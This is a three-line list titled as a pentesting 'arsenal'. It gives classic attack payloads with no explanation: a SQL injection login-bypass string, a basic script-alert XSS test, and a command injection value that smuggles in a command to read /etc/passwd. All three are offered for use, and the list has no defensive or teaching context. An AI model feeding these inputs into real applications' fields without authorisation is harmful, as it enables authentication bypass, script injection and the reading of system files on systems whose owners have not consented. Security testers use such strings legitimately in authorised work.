Your Ultimate Pentesting Arsenal
SQL Injection: ' OR '1'='1
XSS: <script>alert('XSS')</script>
Command Injection: & cat /etc/passwd